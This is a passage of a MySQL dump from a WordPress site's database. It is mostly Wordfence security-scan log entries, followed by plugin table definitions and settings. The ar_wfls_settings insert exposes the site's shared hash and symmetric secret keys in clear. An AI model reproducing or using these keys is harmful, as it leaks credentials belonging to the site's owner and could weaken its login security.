far'),(29939,1556439998.984362,2,'info','Analyzed 3700 files containing 81.39 MB of data so far'),(29940,1556439999.407848,2,'info','Analyzed 3800 files containing 81.59 MB of data so far'),(29941,1556439999.718681,2,'info','Analyzed 3900 files containing 82.06 MB of data so far'),(29942,1556440000.054535,2,'info','Analyzed 4000 files containing 82.38 MB of data so far'),(29943,1556440000.349257,2,'info','Analyzed 4100 files containing 82.93 MB of data so far'),(29944,1556440000.651580,2,'info','Analyzed 4200 files containing 83.23 MB of data so far'),(29872,1556439963.878367,2,'info','Found 21 plugins'),(29873,1556439963.878584,2,'info','Getting theme list from WordPress'),(30241,1556693683.141868,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29667,1556175059.050406,2,'info','500 files indexed'),(30216,1556693663.400910,2,'info','Scanned contents of 70 additional files at 21.50 per second'),(29229,1555656723.735160,2,'info','Analyzed 2300 files containing 47.53 MB of data so far'),(29230,1555656724.091155,2,'info','Analyzed 2400 files containing 48.72 MB of data so far'),(29752,1556175103.119939,2,'info','Analyzed 6900 files containing 123.46 MB of data so far'),(29751,1556175102.936605,2,'info','Analyzed 6800 files containing 123.29 MB of data so far'),(29750,1556175102.512275,2,'info','Analyzed 6700 files containing 121.76 MB of data so far'),(29749,1556175101.991289,2,'info','Analyzed 6600 files containing 119.74 MB of data so far'),(30221,1556693668.561154,2,'info','Scanned contents of 160 additional files at 19.01 per second'),(30220,1556693667.558887,2,'info','Scanned contents of 139 additional files at 18.75 per second'),(29917,1556439983.414723,2,'info','Analyzed 1500 files containing 35.08 MB of data so far'),(29918,1556439984.374674,2,'info','Analyzed 1600 files containing 39.37 MB of data so far'),(29475,1555916693.173481,2,'info','Analyzed 900 files containing 14.7 MB of data so far'),(29919,1556439984.571688,2,'info','Analyzed 1700 files containing 39.82 MB of data so far'),(29729,1556175092.883295,2,'info','Analyzed 4600 files containing 85.39 MB of data so far'),(29731,1556175094.704464,2,'info','Analyzed 4800 files containing 92.64 MB of data so far'),(29730,1556175093.544613,2,'info','Analyzed 4700 files containing 87.35 MB of data so far'),(29691,1556175069.870642,2,'info','Analyzed 800 files containing 14.37 MB of data so far'),(29690,1556175066.523157,2,'info','Analyzed 700 files containing 10.33 MB of data so far'),(29692,1556175070.022394,2,'info','Analyzed 900 files containing 14.7 MB of data so far'),(29693,1556175070.461036,2,'info','Analyzed 1000 files containing 17.99 MB of data so far'),(29071,1555397965.003939,2,'info','Analyzed 8105 files containing 145.94 MB of data.'),(29070,1555397964.993297,2,'info','Analyzed 8100 files containing 145.88 MB of data so far'),(29861,1556439963.831056,2,'info','Scanning DNS MX record for ashbyresort.com'),(29286,1555656753.958391,2,'info','Analyzed 7917 files containing 138.45 MB of data.'),(29920,1556439984.771279,2,'info','Analyzed 1800 files containing 40.45 MB of data so far'),(29537,1555916722.816510,2,'info','Analyzed 7100 files containing 123.87 MB of data so far'),(29538,1555916723.591189,2,'info','Analyzed 7200 files containing 127.65 MB of data so far'),(29965,1556440009.104879,2,'info','Analyzed 6300 files containing 114.08 MB of data so far'),(29964,1556440008.654608,2,'info','Analyzed 6200 files containing 112.18 MB of data so far'),(29166,1555656705.656777,2,'info','Scanning DNS MX record for ashbyresort.com'),(29787,1556175130.576288,2,'info','Asking Wordfence to check URLs against malware list.'),(30240,1556693683.141244,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(29165,1555656705.652906,2,'info','Scanning DNS A record for ashbyresort.com'),(29164,1555656704.562650,2,'info','Starting DNS scan for ashbyresort.com'),(30074,1556693565.065290,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(29473,1555916689.638140,2,'info','Analyzed 700 files containing 10.33 MB of data so far'),(30249,1556693683.505132,10,'info','SUM_ENDOK:Scanning for weak passwords'),(29344,1555656817.346288,2,'info','Scanned contents of 758 additional files at 12.22 per second'),(30239,1556693683.109646,10,'info','SUM_START:Scanning posts for URLs on a domain blacklist'),(29884,1556439964.911214,10,'info','SUM_START:Scanning for known malware files'),(29410,1555896206.059693,1,'info','-------------------'),(30027,1556440047.196574,2,'info','Starting password strength check on 2 users.'),(30026,1556440047.192404,10,'info','SUM_START:Scanning for weak passwords'),(29848,1556414237.259630,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30281,1556846991.242514,10,'info','SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),(29850,1556439953.249014,1,'info','Scheduled Wordfence scan starting at Sunday 28th of April 2019 03:25:53 AM'),(30121,1556693599.380244,2,'info','7500 files indexed'),(29193,1555656706.917518,2,'info','1500 files indexed'),(29194,1555656706.981916,2,'info','2000 files indexed'),(29192,1555656706.851114,2,'info','1000 files indexed'),(29784,1556175126.545433,2,'info','Scanned contents of 255 additional files at 17.61 per second'),(30282,1588310398.143692,10,'info','SUM_PREP:Preparing a new scan.'),(30283,1588310398.147903,1,'info','Initiating quick scan'),(30284,1588310398.151953,10,'info','SUM_START:Checking Web Application Firewall status'),(30285,1588310398.166041,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30286,1588310398.436891,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(30287,1588310398.596026,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30288,1588310398.618259,1,'info','-------------------'),(30289,1588310398.626160,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 66 MB'),(30290,1588310398.626641,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30291,1588310398.626981,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(30292,1592263342.793210,1,'info','Scheduled Wordfence scan starting at Monday 15th of June 2020 02:22:22 PM'),(30293,1592263345.153207,10,'info','SUM_PREP:Preparing a new scan.'),(30294,1592263345.156465,1,'info','Contacting Wordfence to initiate scan'),(30295,1592263345.615821,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(30296,1592263347.618153,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(30297,1592263349.942578,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 68 MB'),(30298,1592263349.942842,2,'error','Scan terminated with message: Aborting scan because WordPress updated from version 5.4.1 to 5.4.2. The scan will be reattempted later.'),(30299,1592263349.943167,2,'error','No scan is scheduled'),(30300,1593109435.917020,1,'info','Scheduled Wordfence scan starting at Thursday 25th of June 2020 09:23:55 AM'),(30301,1593109435.921829,10,'info','SUM_PREP:Preparing a new scan.'),(30302,1593109435.923933,1,'info','Initiating quick scan'),(30303,1593109435.926378,10,'info','SUM_START:Checking Web Application Firewall status'),(30304,1593109435.926900,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30305,1593109435.931417,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(30306,1593109435.956643,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30307,1593109435.959544,1,'info','-------------------'),(30308,1593109435.960321,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 68 MB'),(30309,1593109435.960572,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30310,1593109435.960806,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(30311,1593109438.427362,10,'info','SUM_PREP:Preparing a new scan.'),(30312,1593109438.430578,1,'info','Contacting Wordfence to initiate scan'),(30313,1593109439.089107,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(30314,1593109441.091287,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(30315,1593109443.092992,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(30316,1593109445.098253,10,'info','SUM_START:Checking for the most secure way to get IPs'),(30317,1593109445.102345,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(30318,1593109445.111250,10,'info','SUM_START:Scanning to check available disk space'),(30319,1593109445.115015,2,'info','Total disk space: 5.41 TB -- Free disk space: 177.5 GB'),(30320,1593109445.115377,2,'info','The disk has 181762.48 MB available'),(30321,1593109445.115710,10,'info','SUM_ENDOK:Scanning to check available disk space'),(30322,1593109445.123925,10,'info','SUM_START:Checking Web Application Firewall status'),(30323,1593109445.127032,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30324,1593109445.134053,10,'info','SUM_START:Checking for future GeoIP support'),(30325,1593109445.136430,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(30326,1593109445.142378,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(30327,1593109445.146674,10,'info','SUM_ENDBAD:Checking for paths skipped due to scan settings'),(30328,1593109445.151358,2,'info','Getting plugin list from WordPress'),(30329,1593109445.153053,2,'info','Found 20 plugins'),(30330,1593109445.153270,2,'info','Getting theme list from WordPress'),(30331,1593109445.155944,2,'info','Found 8 themes'),(30332,1593109445.171591,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(30333,1593109446.112701,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(30334,1593109446.116421,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(30335,1593109446.120549,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(30336,1593109446.123994,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(30337,1593109446.644608,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(30338,1593109446.647752,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(30339,1593109446.650209,10,'info','SUM_DISABLED:Skipping theme scan'),(30340,1593109446.650645,10,'info','SUM_DISABLED:Skipping plugin scan'),(30341,1593109446.652414,10,'info','SUM_START:Scanning for known malware files'),(30342,1593109446.656175,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(30343,1593109446.680546,2,'info','500 files indexed'),(30344,1593109446.697300,2,'info','1000 files indexed'),(30345,1593109446.711026,2,'info','1500 files indexed'),(30346,1593109446.727678,2,'info','2000 files indexed'),(30347,1593109446.743757,2,'info','2500 files indexed'),(30348,1593109446.758961,2,'info','3000 files indexed'),(30349,1593109446.783246,2,'info','3500 files indexed'),(30350,1593109446.800796,2,'info','4000 files indexed'),(30351,1593109446.819586,2,'info','4500 files indexed'),(30352,1593109446.836794,2,'info','5000 files indexed'),(30353,1593109446.852929,2,'info','5500 files indexed'),(30354,1593109446.872336,2,'info','6000 files indexed'),(30355,1593109446.886766,2,'info','6500 files indexed'),(30356,1593109446.903748,2,'info','7000 files indexed'),(30357,1593109446.924283,2,'info','7500 files indexed'),(30358,1593109447.034880,2,'info','8000 files indexed'),(30359,1593109447.051989,2,'info','8500 files indexed'),(30360,1593109447.067997,2,'info','9000 files indexed'),(30361,1593109447.070916,2,'info','9014 files indexed'),(30362,1593109447.291255,2,'info','Analyzed 100 files containing 1.46 MB of data so far'),(30363,1593109447.447129,2,'info','Analyzed 200 files containing 2.51 MB of data so far'),(30364,1593109447.607339,2,'info','Analyzed 300 files containing 3.85 MB of data so far'),(30365,1593109447.855250,2,'info','Analyzed 400 files containing 6.32 MB of data so far'),(30366,1593109448.075155,2,'info','Analyzed 500 files containing 7.12 MB of data so far'),(30367,1593109448.288573,2,'info','Analyzed 600 files containing 10.69 MB of data so far'),(30368,1593109448.415144,2,'info','Analyzed 700 files containing 12.45 MB of data so far'),(30369,1593109448.542752,2,'info','Analyzed 800 files containing 14.45 MB of data so far'),(30370,1593109448.657727,2,'info','Analyzed 900 files containing 15.74 MB of data so far'),(30371,1593109448.834256,2,'info','Analyzed 1000 files containing 19.64 MB of data so far'),(30372,1593109449.000090,2,'info','Analyzed 1100 files containing 22.69 MB of data so far'),(30373,1593109449.141928,2,'info','Analyzed 1200 files containing 25.26 MB of data so far'),(30374,1593109449.416291,2,'info','Analyzed 1300 files containing 32.2 MB of data so far'),(30375,1593109449.569914,2,'info','Analyzed 1400 files containing 34.11 MB of data so far'),(30376,1593109449.700370,2,'info','Analyzed 1500 files containing 36.48 MB of data so far'),(30377,1593109449.912202,2,'info','Analyzed 1600 files containing 42.89 MB of data so far'),(30378,1593109450.140122,2,'info','Analyzed 1700 files containing 49.47 MB of data so far'),(30379,1593109450.235573,2,'info','Analyzed 1800 files containing 49.86 MB of data so far'),(30380,1593109450.340386,2,'info','Analyzed 1900 files containing 50.35 MB of data so far'),(30381,1593109450.459606,2,'info','Analyzed 2000 files containing 51.3 MB of data so far'),(30382,1593109450.645628,2,'info','Analyzed 2100 files containing 56.23 MB of data so far'),(30383,1593109450.757523,2,'info','Analyzed 2200 files containing 56.72 MB of data so far'),(30384,1593109450.906727,2,'info','Analyzed 2300 files containing 59.61 MB of data so far'),(30385,1593109451.025917,2,'info','Analyzed 2400 files containing 61.04 MB of data so far'),(30386,1593109451.137652,2,'info','Analyzed 2500 files containing 61.96 MB of data so far'),(30387,1593109451.372662,2,'info','Analyzed 2600 files containing 67.34 MB of data so far'),(30388,1593109451.502450,2,'info','Analyzed 2700 files containing 68.46 MB of data so far'),(30389,1593109451.617878,2,'info','Analyzed 2800 files containing 69.35 MB of data so far'),(30390,1593109451.725829,2,'info','Analyzed 2900 files containing 69.85 MB of data so far'),(30391,1593109451.831700,2,'info','Analyzed 3000 files containing 70.37 MB of data so far'),(30392,1593109452.028962,2,'info','Analyzed 3100 files containing 75.68 MB of data so far'),(30393,1593109452.121377,2,'info','Analyzed 3200 files containing 76.03 MB of data so far'),(30394,1593109452.209100,2,'info','Analyzed 3300 files containing 76.3 MB of data so far'),(30395,1593109452.294088,2,'info','Analyzed 3400 files containing 76.68 MB of data so far'),(30396,1593109452.417780,2,'info','Analyzed 3500 files containing 78.8 MB of data so far'),(30397,1593109452.518304,2,'info','Analyzed 3600 files containing 79.49 MB of data so far'),(30398,1593109452.652741,2,'info','Analyzed 3700 files containing 82.12 MB of data so far'),(30399,1593109453.006652,2,'info','Analyzed 3800 files containing 93.46 MB of data so far'),(30400,1593109453.176107,2,'info','Analyzed 3900 files containing 97.03 MB of data so far'),(30401,1593109453.286730,2,'info','Analyzed 4000 files containing 97.24 MB of data so far'),(30402,1593109453.391689,2,'info','Analyzed 4100 files containing 97.59 MB of data so far'),(30403,1593109453.491660,2,'info','Analyzed 4200 files containing 98 MB of data so far'),(30404,1593109453.594013,2,'info','Analyzed 4300 files containing 98.54 MB of data so far'),(30405,1593109453.706556,2,'info','Analyzed 4400 files containing 98.82 MB of data so far'),(30406,1593109453.801778,2,'info','Analyzed 4500 files containing 99.08 MB of data so far'),(30407,1593109453.933397,2,'info','Analyzed 4600 files containing 100.46 MB of data so far'),(30408,1593109454.456167,2,'info','Analyzed 4700 files containing 100.54 MB of data so far'),(30409,1593109454.556394,2,'info','Analyzed 4800 files containing 100.89 MB of data so far'),(30410,1593109454.677186,2,'info','Analyzed 4900 files containing 102 MB of data so far'),(30411,1593109454.796538,2,'info','Analyzed 5000 files containing 103.86 MB of data so far'),(30412,1593109454.991909,2,'info','Analyzed 5100 files containing 109.07 MB of data so far'),(30413,1593109458.056203,2,'info','Analyzed 5200 files containing 110.61 MB of data so far'),(30414,1593109458.221550,2,'info','Analyzed 5300 files containing 111.74 MB of data so far'),(30415,1593109458.352922,2,'info','Analyzed 5400 files containing 112.46 MB of data so far'),(30416,1593109458.509522,2,'info','Analyzed 5500 files containing 112.98 MB of data so far'),(30417,1593109458.631099,2,'info','Analyzed 5600 files containing 113.32 MB of data so far'),(30418,1593109458.779574,2,'info','Analyzed 5700 files containing 113.61 MB of data so far'),(30419,1593109458.912974,2,'info','Analyzed 5800 files containing 113.97 MB of data so far'),(30420,1593109459.029362,2,'info','Analyzed 5900 files containing 114.31 MB of data so far'),(30421,1593109459.431460,2,'info','Analyzed 6000 files containing 115.05 MB of data so far'),(30422,1593109459.648238,2,'info','Analyzed 6100 files containing 119.38 MB of data so far'),(30423,1593109459.810407,2,'info','Analyzed 6200 files containing 120.92 MB of data so far'),(30424,1593109459.944057,2,'info','Analyzed 6300 files containing 121.54 MB of data so far'),(30425,1593109460.066163,2,'info','Analyzed 6400 files containing 121.98 MB of data so far'),(30426,1593109460.214055,2,'info','Analyzed 6500 files containing 122.42 MB of data so far'),(30427,1593109460.339825,2,'info','Analyzed 6600 files containing 122.84 MB of data so far'),(30428,1593109460.487981,2,'info','Analyzed 6700 files containing 124.3 MB of data so far'),(30429,1593109460.721953,2,'info','Analyzed 6800 files containing 127.65 MB of data so far'),(30430,1593109460.859231,2,'info','Analyzed 6900 files containing 129.46 MB of data so far'),(30431,1593109460.984008,2,'info','Analyzed 7000 files containing 130.64 MB of data so far'),(30432,1593109461.080773,2,'info','Analyzed 7100 files containing 130.87 MB of data so far'),(30433,1593109461.199684,2,'info','Analyzed 7200 files containing 131.32 MB of data so far'),(30434,1593109461.319486,2,'info','Analyzed 7300 files containing 132.47 MB of data so far'),(30435,1593109461.455996,2,'info','Analyzed 7400 files containing 134.94 MB of data so far'),(30436,1593109461.628529,2,'info','Analyzed 7500 files containing 137.41 MB of data so far'),(30437,1593109461.736139,2,'info','Analyzed 7600 files containing 138.36 MB of data so far'),(30438,1593109461.888375,2,'info','Analyzed 7700 files containing 139.85 MB of data so far'),(30439,1593109462.087562,2,'info','Analyzed 7800 files containing 143.61 MB of data so far'),(30440,1593109462.232493,2,'info','Analyzed 7900 files containing 146.4 MB of data so far'),(30441,1593109462.524584,2,'info','Analyzed 8000 files containing 147.7 MB of data so far'),(30442,1593109462.822600,2,'info','Analyzed 8100 files containing 149.77 MB of data so far'),(30443,1593109463.287701,2,'info','Analyzed 8200 files containing 152.76 MB of data so far'),(30444,1593109463.515177,2,'info','Analyzed 8300 files containing 154.38 MB of data so far'),(30445,1593109463.862607,2,'info','Analyzed 8400 files containing 156.13 MB of data so far'),(30446,1593109466.349970,2,'info','Analyzed 8500 files containing 165.34 MB of data so far'),(30447,1593109466.931284,2,'info','Analyzed 8600 files containing 168.45 MB of data so far'),(30448,1593109467.358318,2,'info','Analyzed 8700 files containing 170.92 MB of data so far'),(30449,1593109468.007346,2,'info','Analyzed 8800 files containing 174.74 MB of data so far'),(30450,1593109468.182600,2,'info','Analyzed 8900 files containing 176.38 MB of data so far'),(30451,1593109468.471647,2,'info','Analyzed 9000 files containing 178.01 MB of data so far'),(30452,1593109468.496337,2,'info','Analyzed 9014 files containing 178.31 MB of data.'),(30453,1593109468.496636,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(30454,1593109468.500694,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(30455,1593109468.505319,10,'info','SUM_ENDOK:Scanning for known malware files'),(30456,1593109468.513514,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(30457,1593109468.567143,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(30458,1593109468.574586,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(30459,1593109468.576412,10,'info','SUM_START:Scanning file contents for URLs on a domain blacklist'),(30460,1593109469.470356,2,'info','Starting scan of file contents'),(30461,1593109470.630237,2,'info','Scanned contents of 70 additional files at 60.44 per second'),(30462,1593109471.666397,2,'info','Scanned contents of 94 additional files at 42.84 per second'),(30463,1593109472.975855,2,'info','Scanned contents of 116 additional files at 33.11 per second'),(30464,1593109475.926042,2,'info','Scanned contents of 118 additional files at 18.28 per second'),(30465,1593109476.938173,2,'info','Scanned contents of 168 additional files at 22.50 per second'),(30466,1593109478.026986,2,'info','Scanned contents of 202 additional files at 23.61 per second'),(30467,1593109479.035884,2,'info','Scanned contents of 260 additional files at 27.19 per second'),(30468,1593109480.489568,2,'info','Scanned contents of 261 additional files at 23.69 per second'),(30469,1593109480.991572,2,'info','Scanned contents of 267 additional files at 23.18 per second'),(30470,1593109480.991856,2,'info','Asking Wordfence to check URLs against malware list.'),(30471,1593109480.993808,2,'info','Checking 372 host keys against Wordfence scanning servers.'),(30472,1593109481.376627,2,'info','Done host key check.'),(30473,1593109481.386518,2,'info','Done file contents scan'),(30474,1593109481.387664,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(30475,1593109481.391523,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),(30476,1593109481.397469,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(30477,1593109481.399895,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(30478,1593109481.405856,10,'info','SUM_START:Scanning posts for URLs on a domain blacklist'),(30479,1593109481.437313,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(30480,1593109481.437776,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(30481,1593109481.734309,2,'info','Done host key check.'),(30482,1593109481.734769,2,'info','Done examining URLs'),(30483,1593109481.739572,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),(30484,1593109481.745980,10,'info','SUM_START:Scanning comments for URLs on a domain blacklist'),(30485,1593109481.765812,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),(30486,1593109481.772516,10,'info','SUM_START:Scanning for weak passwords'),(30487,1593109481.775139,2,'info','Starting password strength check on 4 users.'),(30488,1593109481.797855,10,'info','SUM_ENDOK:Scanning for weak passwords'),(30489,1593109481.804128,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(30490,1593109484.275182,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30491,1593109484.281160,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(30492,1593109484.286479,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(30493,1593109484.292181,10,'info','SUM_START:Scanning for suspicious site options'),(30494,1593109484.305137,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(30495,1593109484.305602,2,'info','Done examining URLs'),(30496,1593109484.314855,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(30497,1593109484.320099,1,'info','-------------------'),(30498,1593109484.320565,2,'info','Wordfence used 27.15 MB of memory for scan. Server peak memory usage was: 95.15 MB'),(30499,1593109484.320809,1,'info','Scan Complete. Scanned 9014 files, 20 plugins, 8 themes, 22 posts, 0 comments and 222 URLs in 45 seconds.'),(30500,1593109484.321030,10,'info','SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.');
/*!40000 ALTER TABLE `ar_wfStatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfTrafficRates`
--

DROP TABLE IF EXISTS `ar_wfTrafficRates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfTrafficRates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfTrafficRates`
--

LOCK TABLES `ar_wfTrafficRates` WRITE;
/*!40000 ALTER TABLE `ar_wfTrafficRates` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfTrafficRates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `ar_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfls_2fa_secrets`
--

LOCK TABLES `ar_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `ar_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfls_settings`
--

DROP TABLE IF EXISTS `ar_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfls_settings`
--

LOCK TABLES `ar_wfls_settings` WRITE;
/*!40000 ALTER TABLE `ar_wfls_settings` DISABLE KEYS */;
INSERT INTO `ar_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1574861986','yes'),('ntp-offset','0.417132854462','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','76b1167adfd897d77ca8ceac03ca32805ee2da3bd7effe40e64be26f22f38c42','yes'),('shared-symmetric-secret','068f869f74ec9fb40ee1e13829e7ac0f42b722ed258342d75e9a8e0c81d6c640','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `ar_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_calendars`
--

DROP TABLE IF EXISTS `ar_wpdevart_calendars`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_calendars` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL,
  `title` varchar(128) NOT NULL,
  `hours_enabled` varchar(3) NOT NULL,
  `hours_interval_enabled` varchar(3) NOT NULL,
  `theme_id` int(11) NOT NULL,
  `form_id` int(11) NOT NULL,
  `extra_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_calendars`
--

LOCK TABLES `ar_wpdevart_calendars` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_calendars` DISABLE KEYS */;
INSERT INTO `ar_wpdevart_calendars` VALUES (1,1,'Calendar','','',1,1,0);
/*!40000 ALTER TABLE `ar_wpdevart_calendars` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_dates`
--

DROP TABLE IF EXISTS `ar_wpdevart_dates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_dates` (
  `unique_id` varchar(32) NOT NULL,
  `calendar_id` int(11) NOT NULL,
  `day` varchar(16) NOT NULL,
  `data` text NOT NULL,
  PRIMARY KEY (`unique_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_dates`
--

LOCK TABLES `ar_wpdevart_dates` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_dates` DISABLE KEYS */;
INSERT INTO `ar_wpdevart_dates` VALUES ('1_1970-01-01',1,'1970-01-01','{\"status\":\"available\",\"available\":1,\"info_users\":\"\",\"info_admin\":\"\",\"price\":\"\",\"marked_price\":\"\"}');
/*!40000 ALTER TABLE `ar_wpdevart_dates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_extras`
--

DROP TABLE IF EXISTS `ar_wpdevart_extras`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_extras` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(128) NOT NULL,
  `data` text NOT NULL,
  `user_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_extras`
--

LOCK TABLES `ar_wpdevart_extras` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_extras` DISABLE KEYS */;
